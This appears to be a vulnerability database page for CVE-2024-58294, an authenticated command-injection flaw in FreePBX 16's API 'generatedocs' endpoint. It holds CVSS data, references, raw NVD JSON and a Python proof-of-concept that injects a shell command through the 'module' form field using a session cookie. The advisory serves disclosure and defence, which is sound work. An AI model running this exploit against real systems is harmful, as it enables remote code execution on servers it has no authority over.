CVE-2024-58294

Description

FreePBX 16 contains an authenticated remote code execution vulnerability in the API module that allows attackers with valid session credentials to execute arbitrary commands. Attackers can exploit the 'generatedocs' endpoint by crafting malicious POST requests with bash command injection to establish remote shell access.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:sangoma:freepbx:16.0:*:*:*:*:*:*:* - VULNERABLE

FreePBX 16

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2024-58294 PoC - FreePBX 16 API Authenticated RCE
# Target: FreePBX 16 API module 'generatedocs' endpoint

import requests
import sys

def exploit_freepbx(target_url, session_cookie, command):
    """
    Exploit the authenticated RCE vulnerability in FreePBX API module.
    Args:
        target_url: Base URL of FreePBX instance
        session_cookie: Valid session cookie (PHPSESSID)
        command: Command to execute on target
    """
    endpoint = f"{target_url}/admin/api/generatedocs"
    
    headers = {
        'Cookie': f'PHPSESSID={session_cookie}',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    
    # Inject command via 'module' parameter
    payload = f"module=;{command}"
    
    try:
        response = requests.post(endpoint, data=payload, headers=headers, timeout=10)
        return response.text
    except requests.RequestException as e:
        return f"Error: {str(e)}"

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("Usage: python3 cve-2024-58294.py <target_url> <session_cookie> <command>")
        print("Example: python3 cve-2024-58294.py http://freepbx.local abc123hash 'id'")
        sys.exit(1)
    
    target = sys.argv[1]
    cookie = sys.argv[2]
    cmd = sys.argv[3]
    
    print(f"[*] Exploiting CVE-2024-58294 on {target}")
    print(f"[*] Executing command: {cmd}")
    result = exploit_freepbx(target, cookie, cmd)
    print(f"[+] Result:\n{result}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2024-58294
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2024-58294
[3] CVE Details https://www.cvedetails.com/cve/CVE-2024-58294/
[4] VulDB https://vuldb.com/cve/CVE-2024-58294
[5] https://www.exploit-db.com/exploits/52031
[6] https://www.freepbx.org/
[7] https://www.vulncheck.com/advisories/freepbx-authenticated-remote-code-execution-via-api-module
[8] https://www.youtube.com/watch?v=rqFJ0BxwlLI

Raw JSON Data

JSON

{"cve": {"id": "CVE-2024-58294", "sourceIdentifier": "[email protected]", "published": "2025-12-11T22:15:50.423", "lastModified": "2025-12-15T17:10:56.713", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FreePBX 16 contains an authenticated remote code execution vulnerability in the API module that allows attackers with valid session credentials to execute arbitrary commands. Attackers can exploit the 'generatedocs' endpoint by crafting malicious POST requests with bash command injection to establish remote shell access."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sangoma:freepbx:16.0:*:*:*:*:*:*:*", "matchCriteriaId": "9DF49D38-481B-4479-8421-1BD3F1CC252B"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/52031", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.freepbx.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/freepbx-authenticated-remote-code-execution-via-api-module", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.youtube.com/watch?v=rqFJ0BxwlLI", "source": "[email protected]", "tags": ["Exploit"]}]}}